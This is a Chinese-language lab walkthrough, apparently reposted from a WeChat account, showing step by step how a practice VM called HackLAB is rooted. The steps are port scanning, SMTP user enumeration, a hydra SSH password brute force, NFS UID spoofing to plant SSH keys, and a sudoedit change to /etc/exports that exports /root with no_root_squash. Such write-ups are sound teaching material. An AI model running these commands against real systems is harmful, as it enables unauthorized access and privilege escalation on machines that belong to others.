靶场奇妙记之HackLAB

admin 2025年2月9日22:37:20评论6 views字数 1794阅读5分58秒阅读模式

HackLAB

发现主机

nmap -sP 192.168.20.0/24

Nmap scan report for 192.168.20.157

靶场奇妙记之HackLAB

扫描端口

nmap -sV -p 1-65535 192.168.20.157
开放端口
22/ssh
25/smtp
79/finger
110/pop3
111/rpcbind
143/imap
512/exec
513/login?
514/shell
993/ssl/imap
995/ssl/pop3
2049/nfs
33384/mountd
41063/nlockmgr
42845/mountd
51390/mountd
52848/status
靶场奇妙记之HackLAB

NFS

查询NFS服务器

2049端口开放nfs

nfs网络文件系统,输出网络文件

showmount -e 192.168.20.157

结果:/home/vulnix *

靶场奇妙记之HackLAB

挂载/home/vulnix目录

mkdir /tmp/nfs/
mount -t nfs 192.168.20.157:/home/vulnix /tmp/nfs/
cd /tmp/nfs

权限不够,需要同UID的用户

靶场奇妙记之HackLAB

smtp

扫描25端口

25端口开放smtp邮件服务

nmap -A -p 25 192.168.20.157

用户:vulnix

命令:VRFY, ETRN, STARTTLS

靶场奇妙记之HackLAB

枚举smtp

smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.20.157
靶场奇妙记之HackLAB

过滤用户

枚举结果复制到user.txt文件

vi user.txt
cat user.txt | cut -d ' ' -f2 | cut -d ' ' -f1 >user2.txt
靶场奇妙记之HackLAB

验证用户

finger [email protected]
finger [email protected]
finger [email protected]

三个用户存在

靶场奇妙记之HackLAB

爆破ssh

hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.20.157 ssh

结果:

login: user
password: letmein
靶场奇妙记之HackLAB

ssh登录

ssh [email protected]

登录成功

靶场奇妙记之HackLAB

查看passwd文件

cat /etc/passwd

vulnix:x:2008:2008::/home/vulnix:/bin/bash

vulnix的UID为2008

靶场奇妙记之HackLAB

kali创建同uid同名的用户

useradd -u 2008 vulnix
su vulnix
cd /tmp/nfs
靶场奇妙记之HackLAB

在/tmp/nsf创建ssh证书

mkdir .ssh
cd .ssh
ssh-keygen -t rsa
./id_rsa,密码为空
靶场奇妙记之HackLAB

修改密钥

重命名公钥,复制私钥到kali

mv id_rsa.pub authorized_keys
mv id_rsa /tmp/id_rsa
chmod 600 /tmp/id_rsa
靶场奇妙记之HackLAB

登录ssh

使用私钥登录ssh

ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i /tmp/id_rsa [email protected]
靶场奇妙记之HackLAB

提权

sudo -l

可使用sudo命令:sudoedit /etc/exports

靶场奇妙记之HackLAB

修改/etc/exports,挂载root目录

sudoedit /etc/exports
  /root *(rw,no_root_squash)

重启靶机

靶场奇妙记之HackLAB

查看挂载目录

showmount -e 192.168.20.157
靶场奇妙记之HackLAB

kali创建目录

mkdir /tmp/nfs2/
mount -t nfs 192.168.20.157:/root /tmp/nfs2/
cd /tmp/nfs2
靶场奇妙记之HackLAB

创建ssh密钥

mkdir .ssh
cd .ssh
ssh-keygen -t rsa
./id_rsa2 密码空
靶场奇妙记之HackLAB

修改密钥

重命名公钥,复制私钥到kali

mv id_rsa2.pub authorized_keys
mv id_rsa2 /tmp/id_rsa2
chmod 600 /tmp/id_rsa2
靶场奇妙记之HackLAB

登录ssh

使用私钥登录ssh

ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i /tmp/id_rsa2 [email protected]
靶场奇妙记之HackLAB

提权成功

红队全栈教学

可在公众号回复“红队”获取群链接

原文始发于微信公众号(泷羽Sec-Ceo):靶场奇妙记之HackLAB

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月9日22:37:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶场奇妙记之HackLABhttps://cn-sec.com/archives/3719078.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息